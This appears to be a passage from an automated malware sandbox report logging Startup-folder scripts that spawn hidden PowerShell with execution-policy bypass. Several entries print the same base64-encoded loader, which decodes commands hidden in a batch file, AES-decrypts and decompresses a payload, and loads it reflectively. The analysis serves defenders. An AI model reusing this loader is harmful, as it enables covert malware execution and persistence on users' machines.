ZWN1cml0eS5DcnlwdG9ncmFwaHkuUGFkZGluZ01vZGVdOjpQS0NTNzsJJGFlc192YXIuS2V5PVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ3NYeGtuSGEzMEVib3gxcmd2YkdoYzJnRnpWQVlUY1hESE1sQmFSQ0x1cGM9Jyk7CSRhZXNfdmFyLklWPVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ0l5cnlFVjRZOVMzVmdWU3FxQ2lpb0E9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gaHRkdXMoJHBhcmFtX3Zhcil7CSRrdHlxdz1OZXctT2JqZWN0IFN5c3RlbS5JTy5NZW1vcnlTdHJlYW0oLCRwYXJhbV92YXIpOwkkamxwbmE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTWVtb3J5U3RyZWFtOwkkb3hmZWk9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ29tcHJlc3Npb24uR1ppcFN0cmVhbSgka3R5cXcsIFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTsJJG94ZmVpLkNvcHlUbygkamxwbmEpOwkkb3hmZWkuRGlzcG9zZSgpOwkka3R5cXcuRGlzcG9zZSgpOwkkamxwbmEuRGlzcG9zZSgpOwkkamxwbmEuVG9BcnJheSgpO31mdW5jdGlvbiB2bWV1cCgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJJHVxZW1iPVtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OignZGFvTCd			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_f830a6f2.cmd"			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('JHVzZXJOYW1lID0gJGVudjpVU0VSTkFNRTskcGxwcWwgPSAiQzpcVXNlcnNcJHVzZXJOYW1lXGR3bS5iYXQiO2lmIChUZXN0LVBhdGggJHBscHFsKSB7ICAgIFdyaXRlLUhvc3QgIkJhdGNoIGZpbGUgZm91bmQ6ICRwbHBxbCIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAkZmlsZUxpbmVzID0gW1N5c3RlbS5JTy5GaWxlXTo6UmVhZEFsbExpbmVzKCRwbHBxbCwgW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOCk7ICAgIGZvcmVhY2ggKCRsaW5lIGluICRmaWxlTGluZXMpIHsgICAgICAgIGlmICgkbGluZSAtbWF0Y2ggJ146OjogPyguKykkJykgeyAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRldGVjdGVkIGluIHRoZSBiYXRjaCBmaWxlLiIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAgICAgICAgIHRyeSB7ICAgICAgICAgICAgICAgICRkZWNvZGVkQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRtYXRjaGVzWzFdLlRyaW0oKSk7ICAgICAgICAgICAgICAgICRpbmplY3Rpb25Db2RlID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VW5pY29kZS5HZXRTdHJpbmcoJGRlY29kZWRCeXRlcyk7ICAgICAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRlY29kZWQgc3VjY2Vzc2Z1bGx5LiIgLUZvcmVncm91bmRDb2xvciBHcmVlbjsgICAgICAgICAgICAgICAgV3JpdGUtSG9zdCAiRXhlY3V0aW5nIGluamVjdGlvbiBjb2RlLi4uIiAtRm9yZWdyb3VuZENvbG9yIFllbGxvdzsgICAgICAgICAgICAgICAgSW52b2tlLUV4cHJlc3Npb24gJGluamVjdGlvbkNvZGU7ICAgICAgICAgICAgICAgIGJyZWFrOyAgICAgICAgICAgIH0gY2F0Y2ggeyAgICAgICAgICAgICAgICBXcml0ZS1Ib3N0ICJFcnJvciBkdXJpbmcgZGVjb2Rpbmcgb3IgZXhlY3V0aW5nIGluamVjdGlvbiBjb2RlOiAkXyIgLUZvcmVncm91bmRDb2xvciBSZWQ7ICAgICAgICAgICAgfTsgICAgICAgIH07ICAgIH07fSBlbHNlIHsgICAgICBXcml0ZS1Ib3N0ICJTeXN0ZW0gRXJyb3I6IEJhdGNoIGZpbGUgbm90IGZvdW5kOiAkcGxwcWwiIC1Gb3JlZ3JvdW5kQ29sb3IgUmVkOyAgICBleGl0O307ZnVuY3Rpb24gemR0Z3QoJHBhcmFtX3Zhcil7CSRhZXNfdmFyPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkFlc106OkNyZWF0ZSgpOwkkYWVzX3Zhci5Nb2RlPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkNpcGhlck1vZGVdOjpDQkM7CSRhZXNfdmFyLlBhZGRpbmc9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuUGFkZGluZ01vZGVdOjpQS0NTNzsJJGFlc192YXIuS2V5PVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ3NYeGtuSGEzMEVib3gxcmd2YkdoYzJnRnpWQVlUY1hESE1sQmFSQ0x1cGM9Jyk7CSRhZXNfdmFyLklWPVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ0l5cnlFVjRZOVMzVmdWU3FxQ2lpb0E9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gaHRkdXMoJHBhcmFtX3Zhcil7CSRrdHlxdz1OZXctT2JqZWN0IFN5c3RlbS5JTy5NZW1vcnlTdHJlYW0oLCRwYXJhbV92YXIpOwkkamxwbmE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTWVtb3J5U3RyZWFtOwkkb3hmZWk9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ29tcHJlc3Npb24uR1ppcFN0cmVhbSgka3R5cXcsIFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTsJJG94ZmVpLkNvcHlUbygkamxwbmEpOwkkb3hmZWkuRGlzcG9zZSgpOwkka3R5cXcuRGlzcG9zZSgpOwkkamxwbmEuRGlzcG9zZSgpOwkkamxwbmEuVG9BcnJheSgpO31mdW5jdGlvbiB2bWV1cCgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJJHVxZW1iPVtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OignZGFvTCd			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_cb5dd181.cmd"			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('JHVzZXJOYW1lID0gJGVudjpVU0VSTkFNRTskcGxwcWwgPSAiQzpcVXNlcnNcJHVzZXJOYW1lXGR3bS5iYXQiO2lmIChUZXN0LVBhdGggJHBscHFsKSB7ICAgIFdyaXRlLUhvc3QgIkJhdGNoIGZpbGUgZm91bmQ6ICRwbHBxbCIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAkZmlsZUxpbmVzID0gW1N5c3RlbS5JTy5GaWxlXTo6UmVhZEFsbExpbmVzKCRwbHBxbCwgW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOCk7ICAgIGZvcmVhY2ggKCRsaW5lIGluICRmaWxlTGluZXMpIHsgICAgICAgIGlmICgkbGluZSAtbWF0Y2ggJ146OjogPyguKykkJykgeyAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRldGVjdGVkIGluIHRoZSBiYXRjaCBmaWxlLiIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAgICAgICAgIHRyeSB7ICAgICAgICAgICAgICAgICRkZWNvZGVkQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRtYXRjaGVzWzFdLlRyaW0oKSk7ICAgICAgICAgICAgICAgICRpbmplY3Rpb25Db2RlID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VW5pY29kZS5HZXRTdHJpbmcoJGRlY29kZWRCeXRlcyk7ICAgICAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRlY29kZWQgc3VjY2Vzc2Z1bGx5LiIgLUZvcmVncm91bmRDb2xvciBHcmVlbjsgICAgICAgICAgICAgICAgV3JpdGUtSG9zdCAiRXhlY3V0aW5nIGluamVjdGlvbiBjb2RlLi4uIiAtRm9yZWdyb3VuZENvbG9yIFllbGxvdzsgICAgICAgICAgICAgICAgSW52b2tlLUV4cHJlc3Npb24gJGluamVjdGlvbkNvZGU7ICAgICAgICAgICAgICAgIGJyZWFrOyAgICAgICAgICAgIH0gY2F0Y2ggeyAgICAgICAgICAgICAgICBXcml0ZS1Ib3N0ICJFcnJvciBkdXJpbmcgZGVjb2Rpbmcgb3IgZXhlY3V0aW5nIGluamVjdGlvbiBjb2RlOiAkXyIgLUZvcmVncm91bmRDb2xvciBSZWQ7ICAgICAgICAgICAgfTsgICAgICAgIH07ICAgIH07fSBlbHNlIHsgICAgICBXcml0ZS1Ib3N0ICJTeXN0ZW0gRXJyb3I6IEJhdGNoIGZpbGUgbm90IGZvdW5kOiAkcGxwcWwiIC1Gb3JlZ3JvdW5kQ29sb3IgUmVkOyAgICBleGl0O307ZnVuY3Rpb24gemR0Z3QoJHBhcmFtX3Zhcil7CSRhZXNfdmFyPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkFlc106OkNyZWF0ZSgpOwkkYWVzX3Zhci5Nb2RlPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkNpcGhlck1vZGVdOjpDQkM7CSRhZXNfdmFyLlBhZGRpbmc9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuUGFkZGluZ01vZGVdOjpQS0NTNzsJJGFlc192YXIuS2V5PVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ3NYeGtuSGEzMEVib3gxcmd2YkdoYzJnRnpWQVlUY1hESE1sQmFSQ0x1cGM9Jyk7CSRhZXNfdmFyLklWPVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ0l5cnlFVjRZOVMzVmdWU3FxQ2lpb0E9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gaHRkdXMoJHBhcmFtX3Zhcil7CSRrdHlxdz1OZXctT2JqZWN0IFN5c3RlbS5JTy5NZW1vcnlTdHJlYW0oLCRwYXJhbV92YXIpOwkkamxwbmE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTWVtb3J5U3RyZWFtOwkkb3hmZWk9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ29tcHJlc3Npb24uR1ppcFN0cmVhbSgka3R5cXcsIFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTsJJG94ZmVpLkNvcHlUbygkamxwbmEpOwkkb3hmZWkuRGlzcG9zZSgpOwkka3R5cXcuRGlzcG9zZSgpOwkkamxwbmEuRGlzcG9zZSgpOwkkamxwbmEuVG9BcnJheSgpO31mdW5jdGlvbiB2bWV1cCgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJJHVxZW1iPVtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OignZGFvTCd			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_91fb5707.cmd"			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('JHVzZXJOYW1lID0gJGVudjpVU0VSTkFNRTskcGxwcWwgPSAiQzpcVXNlcnNcJHVzZXJOYW1lXGR3bS5iYXQiO2lmIChUZXN0LVBhdGggJHBscHFsKSB7ICAgIFdyaXRlLUhvc3QgIkJhdGNoIGZpbGUgZm91bmQ6ICRwbHBxbCIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAkZmlsZUxpbmVzID0gW1N5c3RlbS5JTy5GaWxlXTo6UmVhZEFsbExpbmVzKCRwbHBxbCwgW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOCk7ICAgIGZvcmVhY2ggKCRsaW5lIGluICRmaWxlTGluZXMpIHsgICAgICAgIGlmICgkbGluZSAtbWF0Y2ggJ146OjogPyguKykkJykgeyAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRldGVjdGVkIGluIHRoZSBiYXRjaCBmaWxlLiIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAgICAgICAgIHRyeSB7ICAgICAgICAgICAgICAgICRkZWNvZGVkQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRtYXRjaGVzWzFdLlRyaW0oKSk7ICAgICAgICAgICAgICAgICRpbmplY3Rpb25Db2RlID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VW5pY29kZS5HZXRTdHJpbmcoJGRlY29kZWRCeXRlcyk7ICAgICAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRlY29kZWQgc3VjY2Vzc2Z1bGx5LiIgLUZvcmVncm91bmRDb2xvciBHcmVlbjsgICAgICAgICAgICAgICAgV3JpdGUtSG9zdCAiRXhlY3V0aW5nIGluamVjdGlvbiBjb2RlLi4uIiAtRm9yZWdyb3VuZENvbG9yIFllbGxvdzsgICAgICAgICAgICAgICAgSW52b2tlLUV4cHJlc3Npb24gJGluamVjdGlvbkNvZGU7ICAgICAgICAgICAgICAgIGJyZWFrOyAgICAgICAgICAgIH0gY2F0Y2ggeyAgICAgICAgICAgICAgICBXcml0ZS1Ib3N0ICJFcnJvciBkdXJpbmcgZGVjb2Rpbmcgb3IgZXhlY3V0aW5nIGluamVjdGlvbiBjb2RlOiAkXyIgLUZvcmVncm91bmRDb2xvciBSZWQ7ICAgICAgICAgICAgfTsgICAgICAgIH07ICAgIH07fSBlbHNlIHsgICAgICBXcml0ZS1Ib3N0ICJTeXN0ZW0gRXJyb3I6IEJhdGNoIGZpbGUgbm90IGZvdW5kOiAkcGxwcWwiIC1Gb3JlZ3JvdW5kQ29sb3IgUmVkOyAgICBleGl0O307ZnVuY3Rpb24gemR0Z3QoJHBhcmFtX3Zhcil7CSRhZXNfdmFyPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkFlc106OkNyZWF0ZSgpOwkkYWVzX3Zhci5Nb2RlPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkNpcGhlck1vZGVdOjpDQkM7CSRhZXNfdmFyLlBhZGRpbmc9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuUGFkZGluZ01vZGVdOjpQS0NTNzsJJGFlc192YXIuS2V5PVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ3NYeGtuSGEzMEVib3gxcmd2YkdoYzJnRnpWQVlUY1hESE1sQmFSQ0x1cGM9Jyk7CSRhZXNfdmFyLklWPVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ0l5cnlFVjRZOVMzVmdWU3FxQ2lpb0E9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gaHRkdXMoJHBhcmFtX3Zhcil7CSRrdHlxdz1OZXctT2JqZWN0IFN5c3RlbS5JTy5NZW1vcnlTdHJlYW0oLCRwYXJhbV92YXIpOwkkamxwbmE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTWVtb3J5U3RyZWFtOwkkb3hmZWk9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ29tcHJlc3Npb24uR1ppcFN0cmVhbSgka3R5cXcsIFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTsJJG94ZmVpLkNvcHlUbygkamxwbmEpOwkkb3hmZWkuRGlzcG9zZSgpOwkka3R5cXcuRGlzcG9zZSgpOwkkamxwbmEuRGlzcG9zZSgpOwkkamxwbmEuVG9BcnJheSgpO31mdW5jdGlvbiB2bWV1cCgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJJHVxZW1iPVtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OignZGFvTCd			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_5d67225f.cmd"			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('JHVzZXJOYW1lID0gJGVudjpVU0VSTkFNRTskcGxwcWwgPSAiQzpcVXNlcnNcJHVzZXJOYW1lXGR3bS5iYXQiO2lmIChUZXN0LVBhdGggJHBscHFsKSB7ICAgIFdyaXRlLUhvc3QgIkJhdGNoIGZpbGUgZm91bmQ6ICRwbHBxbCIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAkZmlsZUxpbmVzID0gW1N5c3RlbS5JTy5GaWxlXTo6UmVhZEFsbExpbmVzKCRwbHBxbCwgW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOCk7ICAgIGZvcmVhY2ggKCRsaW5lIGluICRmaWxlTGluZXMpIHsgICAgICAgIGlmICgkbGluZSAtbWF0Y2ggJ146OjogPyguKykkJykgeyAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRldGVjdGVkIGluIHRoZSBiYXRjaCBmaWxlLiIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAgICAgICAgIHRyeSB7ICAgICAgICAgICAgICAgICRkZWNvZGVkQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRtYXRjaGVzWzFdLlRyaW0oKSk7ICAgICAgICAgICAgICAgICRpbmplY3Rpb25Db2RlID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VW5pY29kZS5HZXRTdHJpbmcoJGRlY29kZWRCeXRlcyk7ICAgICAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRlY29kZWQgc3VjY2Vzc2Z1bGx5LiIgLUZvcmVncm91bmRDb2xvciBHcmVlbjsgICAgICAgICAgICAgICAgV3JpdGUtSG9zdCAiRXhlY3V0aW5nIGluamVjdGlvbiBjb2RlLi4uIiAtRm9yZWdyb3VuZENvbG9yIFllbGxvdzsgICAgICAgICAgICAgICAgSW52b2tlLUV4cHJlc3Npb24gJGluamVjdGlvbkNvZGU7ICAgICAgICAgICAgICAgIGJyZWFrOyAgICAgICAgICAgIH0gY2F0Y2ggeyAgICAgICAgICAgICAgICBXcml0ZS1Ib3N0ICJFcnJvciBkdXJpbmcgZGVjb2Rpbmcgb3IgZXhlY3V0aW5nIGluamVjdGlvbiBjb2RlOiAkXyIgLUZvcmVncm91bmRDb2xvciBSZWQ7ICAgICAgICAgICAgfTsgICAgICAgIH07ICAgIH07fSBlbHNlIHsgICAgICBXcml0ZS1Ib3N0ICJTeXN0ZW0gRXJyb3I6IEJhdGNoIGZpbGUgbm90IGZvdW5kOiAkcGxwcWwiIC1Gb3JlZ3JvdW5kQ29sb3IgUmVkOyAgICBleGl0O307ZnVuY3Rpb24gemR0Z3QoJHBhcmFtX3Zhcil7CSRhZXNfdmFyPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkFlc106OkNyZWF0ZSgpOwkkYWVzX3Zhci5Nb2RlPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkNpcGhlck1vZGVdOjpDQkM7CSRhZXNfdmFyLlBhZGRpbmc9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuUGFkZGluZ01vZGVdOjpQS0NTNzsJJGFlc192YXIuS2V5PVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ3NYeGtuSGEzMEVib3gxcmd2YkdoYzJnRnpWQVlUY1hESE1sQmFSQ0x1cGM9Jyk7CSRhZXNfdmFyLklWPVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ0l5cnlFVjRZOVMzVmdWU3FxQ2lpb0E9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gaHRkdXMoJHBhcmFtX3Zhcil7CSRrdHlxdz1OZXctT2JqZWN0IFN5c3RlbS5JTy5NZW1vcnlTdHJlYW0oLCRwYXJhbV92YXIpOwkkamxwbmE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTWVtb3J5U3RyZWFtOwkkb3hmZWk9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ29tcHJlc3Npb24uR1ppcFN0cmVhbSgka3R5cXcsIFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTsJJG94ZmVpLkNvcHlUbygkamxwbmEpOwkkb3hmZWkuRGlzcG9zZSgpOwkka3R5cXcuRGlzcG9zZSgpOwkkamxwbmEuRGlzcG9zZSgpOwkkamxwbmEuVG9BcnJheSgpO31mdW5jdGlvbiB2bWV1cCgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJJHVxZW1iPVtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OignZGFvTCd
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_9ede7b6f.cmd"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('JHVzZXJOYW1lID0gJGVudjpVU0VSTkFNRTskcGxwcWwgPSAiQzpcVXNlcnNcJHVzZXJOYW1lXGR3bS5iYXQiO2lmIChUZXN0LVBhdGggJHBscHFsKSB7ICAgIFdyaXRlLUhvc3QgIkJhdGNoIGZpbGUgZm91bmQ6ICRwbHBxbCIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAkZmlsZUxpbmVzID0gW1N5c3RlbS5JTy5GaWxlXTo6UmVhZEFsbExpbmVzKCRwbHBxbCwgW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOCk7ICAgIGZvcmVhY2ggKCRsaW5lIGluICRmaWxlTGluZXMpIHsgICAgICAgIGlmICgkbGluZSAtbWF0Y2ggJ146OjogPyguKykkJykgeyAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRldGVjdGVkIGluIHRoZSBiYXRjaCBmaWxlLiIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAgICAgICAgIHRyeSB7ICAgICAgICAgICAgICAgICRkZWNvZGVkQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRtYXRjaGVzWzFdLlRyaW0oKSk7ICAgICAgICAgICAgICAgICRpbmplY3Rpb25Db2RlID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VW5pY29kZS5HZXRTdHJpbmcoJGRlY29kZWRCeXRlcyk7ICAgICAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRlY29kZWQgc3VjY2Vzc2Z1bGx5LiIgLUZvcmVncm91bmRDb2xvciBHcmVlbjsgICAgICAgICAgICAgICAgV3JpdGUtSG9zdCAiRXhlY3V0aW5nIGluamVjdGlvbiBjb2RlLi4uIiAtRm9yZWdyb3VuZENvbG9yIFllbGxvdzsgICAgICAgICAgICAgICAgSW52b2tlLUV4cHJlc3Npb24gJGluamVjdGlvbkNvZGU7ICAgICAgICAgICAgICAgIGJyZWFrOyAgICAgICAgICAgIH0gY2F0Y2ggeyAgICAgICAgICAgICAgICBXcml0ZS1Ib3N0ICJFcnJvciBkdXJpbmcgZGVjb2Rpbmcgb3IgZXhlY3V0aW5nIGluamVjdGlvbiBjb2RlOiAkXyIgLUZvcmVncm91bmRDb2xvciBSZWQ7ICAgICAgICAgICAgfTsgICAgICAgIH07ICAgIH07fSBlbHNlIHsgICAgICBXcml0ZS1Ib3N0ICJTeXN0ZW0gRXJyb3I6IEJhdGNoIGZpbGUgbm90IGZvdW5kOiAkcGxwcWwiIC1Gb3JlZ3JvdW5kQ29sb3IgUmVkOyAgICBleGl0O307ZnVuY3Rpb24gemR0Z3QoJHBhcmFtX3Zhcil7CSRhZXNfdmFyPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkFlc106OkNyZWF0ZSgpOwkkYWVzX3Zhci5Nb2RlPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkNpcGhlck1vZGVdOjpDQkM7CSRhZXNfdmFyLlBhZGRpbmc9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuUGFkZGluZ01vZGVdOjpQS0NTNzsJJGFlc192YXIuS2V5PVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ3NYeGtuSGEzMEVib3gxcmd2YkdoYzJnRnpWQVlUY1hESE1sQmFSQ0x1cGM9Jyk7CSRhZXNfdmFyLklWPVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ0l5cnlFVjRZOVMzVmdWU3FxQ2lpb0E9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNm